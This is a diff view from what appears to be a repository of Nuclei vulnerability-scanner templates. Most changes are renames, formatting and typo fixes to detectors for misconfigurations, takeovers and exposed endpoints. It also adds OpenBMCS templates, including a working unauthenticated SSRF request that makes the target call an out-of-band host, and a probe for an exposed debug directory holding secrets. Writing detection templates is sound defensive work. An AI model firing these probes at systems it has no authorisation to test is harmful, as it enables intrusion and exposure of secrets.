threads: 50
threads: 10
payloads:
path:
- /

4
miscellaneous/old-copyright.yaml
View File

@ -16,9 +16,9 @@ requests:
matchers-condition: and
matchers:
- type: word
part: body
words:
- '2022'
part: body
negative: true
- type: regex
@ -28,10 +28,10 @@ requests:
- '© [1-9]\d*'
- '&copy; [1-9]\d*'
- '&#169; [1-9]\d*'
extractors:
- type: regex
part: body
name: copyright_year
regex:
- 'Copyright [1-9]\d*'
- '© [1-9]\d*'

4
miscellaneous/detect-options-method.yaml → miscellaneous/options-method.yaml
View File

@ -1,7 +1,7 @@
id: detect-options-method
id: options-method
info:
name: Detect enabled OPTIONS methods
name: Allowed Options Method
author: pdteam
severity: info
tags: misc,generic

3
miscellaneous/robots.txt.yaml → miscellaneous/robots-txt.yaml
View File

@ -9,6 +9,7 @@ requests:
- method: GET
path:
- "{{BaseURL}}/robots.txt"
matchers-condition: and
redirects: true
matchers:
@ -17,9 +18,9 @@ requests:
- "Disallow:"
- type: word
part: header
words:
- text/plain
part: header
- type: dsl
dsl:

18
miscellaneous/security.txt.yaml → miscellaneous/security-txt.yaml
View File

@ -10,20 +10,28 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/.well-known/security.txt"
- "{{BaseURL}}/security.txt"
- "{{RootURL}}/.well-known/security.txt"
- "{{RootURL}}/security.txt"
stop-at-first-match: true
redirects: true
max-redirects: 3
max-redirects: 2
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "Contact:"
condition: and
- type: dsl
dsl:
- "len(body) <= 1024 && len(body) > 0"
condition: and
extractors:
- type: regex
group: 1
regex:
- '(?mi)Contact:(.*)'

25
miscellaneous/tabnabbing-check.yaml
View File

@ -1,25 +0,0 @@
id: tabnabbing-check
info:
name: Reverse Tabnabbing
author: bolli95
severity: info
tags: misc
reference:
- https://owasp.org/www-community/attacks/Reverse_Tabnabbing
- https://www.youtube.com/watch?v=TMKZCHYmtD4
- https://hackerone.com/reports/211065
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'regex("<a[A-z0-9\/\"\&\=\%\#\.\:\_\@\\\$ ]*target\=\"_blank\"[A-z0-9\/\"\&\%\=\#\.\:\_\@\\\$ ]*>", replace_regex(replace_regex(body, "<a[A-z0-9\/\"\&\=\%\#\.\:\_\@\\\$ ]*target\=\"_blank\"[A-z0-9\/\"\&\%\=\#\.\:\_\@\\\$ ]*(rel=\"noopener noreferrer\"|rel=\"noreferrer noopener\"|rel=\"noreferrer\"|rel=\"noopener\")[A-z0-9\/\"\&\%\=\#\.\:\_\@\\\$ ]*>", ""), "<a[A-z0-9\/\"\&\=\%\#\.\:\_\@\\\$ ]*(rel=\"noopener noreferrer\"|rel=\"noreferrer noopener\"|rel=\"noreferrer\"|rel=\"noopener\")[A-z0-9\/\"\&\%\=\#\.\:\_\@\\\$ ]*target\=\"_blank\"[A-z0-9\/\"\&\%\=\#\.\:\_\@\\\$ ]*>", "")) || regex("window\.open\\([^,]+\\)", body)'
- type: dsl
dsl:
- "!contains(tolower(all_headers), 'referrer-policy: no-referrer')"

4
miscellaneous/trace-method.yaml
View File

@ -15,9 +15,9 @@ requests:
matchers:
- type: word
name: trace-request
part: body
words:
- "TRACE / HTTP"
part: body
- method: OPTIONS
path:
@ -26,6 +26,6 @@ requests:
matchers:
- type: regex
name: options-request
part: header
regex:
- "(?i)Allow: [A-Z,]*TRACE"
part: header

2
misconfiguration/java-melody-exposed.yaml
View File

@ -4,7 +4,7 @@ info:
name: JavaMelody Monitoring Exposed
author: dhiyaneshDK,thomas_from_offensity
severity: medium
description: JavaMelody is a tool used to monitor Java or Java EE applications in QA and production environments. JavaMelody was detected on this web application. One option in the dashboard is to “View http sessions”. This can be used by an attacker to steal a users session.
description: JavaMelody is a tool used to monitor Java or Java EE applications in QA and production environments. JavaMelody was detected on this web application. One option in the dashboard is to "View http sessions". This can be used by an attacker to steal a user's session.
reference:
- https://www.acunetix.com/vulnerabilities/web/javamelody-publicly-accessible/
- https://github.com/javamelody/javamelody/wiki/UserGuide#16-security

28
misconfiguration/openbmcs/openbmcs-secret-disclosure.yaml Normal file
View File

@ -0,0 +1,28 @@
id: openbmcs-secret-disclosure
info:
name: OpenBMCS 2.4 Secrets Disclosure
author: dhiyaneshDK
severity: high
description: The application allows directory listing and information disclosure of some sensitive files that can allow an attacker to leverage the disclosed information and gain full BMS access
reference: https://www.exploit-db.com/exploits/50671
tags: openbmcs,misconfig
metadata:
shodan-query: http.favicon.hash:1550906681
requests:
- method: GET
path:
- "{{BaseURL}}/debug/"
matchers-condition: and
matchers:
- type: word
words:
- "change_password_sqls"
- "Index of /debug"
condition: and
- type: status
status:
- 200

31
misconfiguration/openbmcs/openbmcs-ssrf.yaml Normal file
View File

@ -0,0 +1,31 @@
id: openbmcs-ssrf
info:
name: OpenBMCS 2.4 Unauthenticated SSRF / RFI
author: dhiyaneshDK
severity: high
description: Unauthenticated Server-Side Request Forgery (SSRF) and Remote File Include (RFI) vulnerability exists in OpenBMCS within its functionalities. The application parses user supplied data in the POST parameter 'ip' to query a server IP on port 81 by default. Since no validation is carried out on the parameter, an attacker can specify an external domain and force the application to make an HTTP request to an arbitrary destination host. This can be used by an external attacker for example to bypass firewalls and initiate a service and network enumeration on the internal network through the affected application, allows hijacking the current session of the user, execute cross-site scripting code or changing the look of the page and content modification on current display
reference: https://www.exploit-db.com/exploits/50670
tags: ssrf,oast,openbmcs
metadata:
shodan-query: http.favicon.hash:1550906681
requests:
- raw:
- |
POST /php/query.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
ip={{interactsh-url}}:80&argu=/
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "http"
- type: status
status:
- 302

2
misconfiguration/prometheus/prometheus-targets.yaml
View File

@ -4,7 +4,7 @@ info:
name: Prometheus targets API endpoint
author: geeknik
severity: info
description: The targets endpoint exposes services belonging to the infrastructure, including their roles and labels. In addition to showing the target machine addresses, the endpoint also exposes metadata labels that are added by the target provider. These labels are intended to contain non-sensitive values, like the name of the server or its description, but various cloud platforms may automatically expose sensitive data in these labels, oftentimes without the developers knowledge.
description: The targets endpoint exposes services belonging to the infrastructure, including their roles and labels. In addition to showing the target machine addresses, the endpoint also exposes metadata labels that are added by the target provider. These labels are intended to contain non-sensitive values, like the name of the server or its description, but various cloud platforms may automatically expose sensitive data in these labels, oftentimes without the developer's knowledge.
reference: https://jfrog.com/blog/dont-let-prometheus-steal-your-fire/
tags: prometheus

2
misconfiguration/springboot/springboot-threaddump.yaml
View File

@ -4,7 +4,7 @@ info:
name: Detect Springboot Thread Dump page
author: philippedelteil
severity: low
description: The threaddump endpoint provides a thread dump from the applications JVM.
description: The threaddump endpoint provides a thread dump from the application's JVM.
reference: https://docs.spring.io/spring-boot/docs/2.4.11-SNAPSHOT/actuator-api/htmlsingle/#threaddump
tags: springboot

2
takeovers/intercom-takeover.yaml
View File

@ -15,6 +15,6 @@ requests:
matchers:
- type: word
words:
- '<h1 class="headline">Uh oh. That page doesn\t exist.</h1>'
- 'This page is reserved for artistic dogs.'
- '<h1 class="headline">Uh oh. That page doesnt exist.</h1>'
condition: and

6
takeovers/shopify-takeover.yaml
View File

@ -2,7 +2,7 @@ id: shopify-takeover
info:
name: shopify takeover detection
author: pdteam
author: pdteam,philippedelteil
severity: high
tags: takeover
reference: https://github.com/EdOverflow/can-i-take-over-xyz
@ -26,4 +26,6 @@ requests:
- type: dsl
dsl:
- '!contains(host,"myshopify.com")'
- '!contains(host,"myshopify.com")'
- '!contains(host,"shopify.com")'
condition: and

Some files were not shown because too many files have changed in this diff Show More